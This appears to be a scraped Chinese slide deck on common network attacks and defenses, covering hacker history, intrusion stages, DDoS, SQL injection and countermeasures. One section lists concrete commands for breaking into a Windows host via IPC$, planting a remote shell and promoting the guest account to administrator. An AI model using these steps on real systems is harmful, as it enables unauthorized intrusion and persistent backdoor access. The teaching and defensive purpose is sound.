{精品}网络攻击的常见手段与防范措施

1、网络攻击的常见手段 与防范措施,目,录,一、计算机网络安全的概念,什么是网络安全？,网络安全：网络安全是指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭受到破坏、更改、泄露，系统连续可靠正常地运行，网络服务不中断。,网络安全的主要特性,保密性 信息不泄露给非授权用户、实体或过程，或供其利用的特性。 完整性 数据未经授权不能进行改变的特性。即信息在存储或传输过程中保持不被修改、不被破坏和丢失的特性。,可用性 可被授权实体访问并按需求使用的特性。即当需要时能否存取所需的信息。例如网络环境下拒绝服务、破坏网络和有关系统的正常运行等都属于对可用性的攻击； 可控性 对信息的传播及内容具有控制能力。 可审查性 出现安全问题时提供依据与手段,目,录,二、常见的网络攻击,黑客,黑客是程序员，掌握操作系统和编程语言方面的知识，乐于探索可编程系统的细节，并且不断提高自身能力，知道系统中的漏洞及其原因所在。专业黑客都是很有才华的源代码创作者。 起源： 20世纪60年代 目的： 基于兴趣非法入侵 基于利益非法入侵 信息战,Kevin Mitnick,凯文米特尼克是世界上最著名的黑客

2、之一，第一个被美国联邦调查局通缉的黑客。 1979年，15岁的米特尼克和他的朋友侵入了北美空中防务指挥系统。,莫里斯蠕虫（Morris Worm）,时间 1988年 肇事者 罗伯特塔潘莫里斯, 美国康奈尔大学学生，其父是美国国家安全局安全专家 机理 利用sendmail, finger 等服务的漏洞，消耗CPU资源，拒绝服务 影响 Internet上大约6000台计算机感染，占当时Internet 联网主机总数的10%，造成9600万美元的损失 黑客从此真正变黑，黑客伦理失去约束，黑客传统开始中断。,2001年中美黑客大战,事件背景和经过 中美军机南海4.1撞机事件为导火线 4月初，以PoizonB0 x、pr0phet为代表的美国黑客组织对国内站点进行攻击，约300个左右的站点页面被修改 4月下旬，国内红（黑）客组织或个人，开始对美国网站进行小规模的攻击行动，4月26日有人发表了 “五一卫国网战”战前声明，宣布将在5月1日至8日，对美国网站进行大规模的攻击行动。 各方都得到第三方支援 各大媒体纷纷报道，评论，中旬结束大战,PoizonB0 x、pr0phet更改的网页,中经网数据有限

3、公司,中国科学院心理研究所,国内某政府网站,国内某大型商业网站,国内黑客组织更改的网站页面,美国劳工部网站,美国某节点网站,美国某大型商业网站,美国某政府网站,这次事件中采用的常用攻击手法,红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下： “我们更多的是一种不满情绪的发泄，大家也可以看到被攻破的都是一些小站，大部分都是NT/Win2000系统， 这个行动在技术上是没有任何炫耀和炒作的价值的。” 主要采用当时流行的系统漏洞进行攻击,这次事件中被利用的典型漏洞,用户名泄漏，缺省安装的系统用户名和密码 Unicode 编码可穿越firewall,执行黑客指令 ASP源代码泄露可远程连接的数据库用户名和密码 SQL server缺省安装 微软Windows 2000登录验证机制可被绕过 Bind 远程溢出，Lion蠕虫 SUN rpc.sadmind 远程溢出，sadmin/IIS蠕虫 Wu-Ftpd 格式字符串错误远程安全漏洞 拒绝服务 (syn-flood , ping ),1980,1985,1990,1995,2000,密码猜测,可自动复制的代码,密码破解

4、,利用已知的漏洞,破坏审计系统,后门,会话劫持,擦除痕迹,嗅探,包欺骗,GUI远程控制,自动探测扫描,拒绝服务,www 攻击,工具,攻击者,入侵者水平,攻击手法,半开放隐蔽扫描,控制台入侵,检测网络管理,DDOS 攻击,2002,高,入侵技术的发展,目,录,常见的攻击方法,端口扫描：网络攻击的前奏 网络监听：局域网、HUB、ARP欺骗、网关设备 邮件攻击：邮件炸弹、邮件欺骗 网页欺骗：伪造网址、DNS重定向 密码破解：字典破解、暴力破解、md5解密 漏洞攻击：溢出攻击、系统漏洞利用 种植木马：隐蔽、免杀、网站挂马、邮件挂马 DoS、DDoS：拒绝服务攻击、分布式拒绝服务攻击 cc攻击：借助大量代理或肉鸡访问最耗资源的网页 XSS跨站攻击、SQL注入：利用变量检查不严格构造javascript语句挂马或获取用户信息，或构造sql语句猜测表、字段以及管理员账号密码 社会工程学：QQ数据库被盗,端口 判断,判断 系统,选择 最简 方式 入侵,分析 可能 有漏 洞的 服务,获取 系统 一定 权限,提 升 为 最 高 权 限,安装 多个 系统 后门,清除 入侵 脚印,攻击其 他系统,获取敏 感信

5、息,作为其 他用途,常见的系统入侵步骤,IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。,攻击步骤,1.收集主机信息,Ping命令判断计算机是否开着，或者数据包发送到返回需要多少时间 Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径 Finger和Rusers命令收集用户信息 Host或者Nslookup命令，结合Whois和Finger命令获取主机、操作系统和用户等信息,应用的方法：,获取网络服务的端口作为入侵通道。,2.端口扫描,1.TCP Connect()2.TCP SYN 3.TCP FIN4.IP段扫瞄 5.TCP反向Ident扫瞄6.FTP代理扫瞄 7.UDP ICMP不到达扫瞄,7种扫瞄类型：,3、系统漏洞利用 一次利用ipc$的入侵过程,1. C:net use x.x.x.xIPC$ “” /user:“admintitrator”用“流光”扫的用户名是administrator，密码为“空”的IP地址 2. C:copy srv.exe x.x.x.xadmin$ 先复制srv.exe上去，在流光的Tools目录

6、下 3. C:net time x.x.x.x 查查时间，发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00，命令成功完成。 4. C:at x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间推后） 5. C:net time x.x.x.x再查查时间到了没有，如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05，那就准备开始下面的命令。,6. C:telnet x.x.x.x 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了 7.C:copy ntlm.exe 127.0.0.1admin$ntlm.exe也在流光的Tools目录中 8. C:WINNTsystem32ntlm 输入ntlm启动（这里的C:WINNTsystem32是在对方计算机上运行当出现“D

7、ONE”的时候，就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务) 9. Telnet x.x.x.x，接着输入用户名与密码就进入对方了 10. C:net user guest /active:yes 为了方便日后登陆,将guest激活并加到管理组 11. C:net user guest 1234 将Guest的密码改为1234 12. C:net localgroup administrators guest /add 将Guest变为Administrator,目,录,北京时间10月22日凌晨，美国域名服务器管理服务供应商Dyn宣布，该公司在当地时间周五早上遭遇了DDoS（分布式拒绝服务）攻击，从而导致许多网站在美国东海岸地区宕机，Twitter、Tumblr、Netflix、亚马逊、Shopify、Reddit、Airbnb、PayPal和Yelp等诸多人气网站无一幸免。Dyn称，攻击由感染恶意代码的设备发起，来自全球上千万IP地址，几百万恶意攻击的源头是物联网联系的所谓“智能”家居产品。,1、DDoS（分布式拒绝服务）攻击,攻击现象 被

8、攻击主机上有大量等待的TCP连接； 网络中充斥着大量的无用的数据包； 源地址为假 制造高流量无用数据，造成网络拥塞，使受害主机无法正常和外界通讯； 利用受害主机提供的传输协议上的缺陷反复高速的发出特定的服务请求，使主机无法处理所有正常请求； 严重时会造成系统死机。,分布式拒绝服务攻击：借助于C/S（客户/服务器）技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DDoS攻击，从而成倍地提高拒绝服务攻击的威力,分布式拒绝服务攻击,攻击流程 1、搜集资料，被攻击目标主机数目、地址情况，目标主机的配置、性能，目标的宽带。 2、是占领和控制网络状态好、性能好、安全管理水平差的主机做傀儡机。 3、攻击者在客户端通过telnet之类的常用连接软件，向主控端发送发送对目标主机的攻击请求命令。主控端侦听接收攻击命令，并把攻击命令传到分布端，分布端是执行攻击的角色，收到命令立即发起flood攻击。,主机设置 所有的主机平台都有抵御DoS的设置，基本的有： 1、关闭不必要的服务 2、限制同时打开的Syn半连接数目 3、缩短Syn半连接的time out 时间 4、及时更新系统补丁 网络设置 1.

9、防火墙 禁止对主机的非开放服务的访问 限制同时打开的SYN最大连接数 限制特定IP地址的访问 启用防火墙的防DDoS的属性 严格限制对外开放的服务器的向外访问 第五项主要是防止自己的服务器被当做工具去害人。 2.路由器 设置SYN数据包流量速率 升级版本过低的ISO 为路由器建立log server,防范措施,雅虎作为美国著名的互联网门户网站，也是20世纪末互联网奇迹的创造者之一。然而在2013年8月20日，中国雅虎邮箱宣布停止提供服务。就在大家已快将其淡忘的时候，雅虎公司突然对外发布消息，承认在2014年的一次黑客袭击中，至少5亿用户的数据信息遭窃。此次事件成为了有史以来规模最大的单一网站信息泄露事件。,2、SQL注入攻击,攻击方法 SQL注入主要是由于网页制作者对输入数据检查不严格，攻击者通过对输入数据的改编来实现对数据库的访问，从而猜测出管理员账号和密码； 如 改为 and user=admin； 如果页面显示正常，说明数据库表中有一个user字段，且其中有admin这个值； 通过SQL注入攻击可以探测网站后台管理员账号和密码。,SQL注入：就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。,利用探测出的管理员账号和密码登陆网站后台，在拥有附件上传的功能模块中尝试上传网页木马或一句话木马（一般利用数据库备份和恢复功能）； 通过网页木马探测IIS服务器配置漏洞，找到突破点提升权限，上传文件木马并在远程服务器上运行； 通过连接木马彻底拿到系统控制权； 因此，SQL注入只是网站入侵的前奏，就算注入成功也不一定可以拿到web shell或root。,1、输入验证 检查用户输入的合法性，确信输入的内容只包含合法的数据。 2、错误消息处理 防范SQL注入，还要避免出现一些详细的错误消息，因为黑客们可以利用这些消息。要使用一种标准的输入确认机制来验证所有的输入数据的长度、类型

《{精品}网络攻击的常见手段与防范措施》由会员小****分享，可在线阅读，更多相关《{精品}网络攻击的常见手段与防范措施》请在金锄头文库上搜索。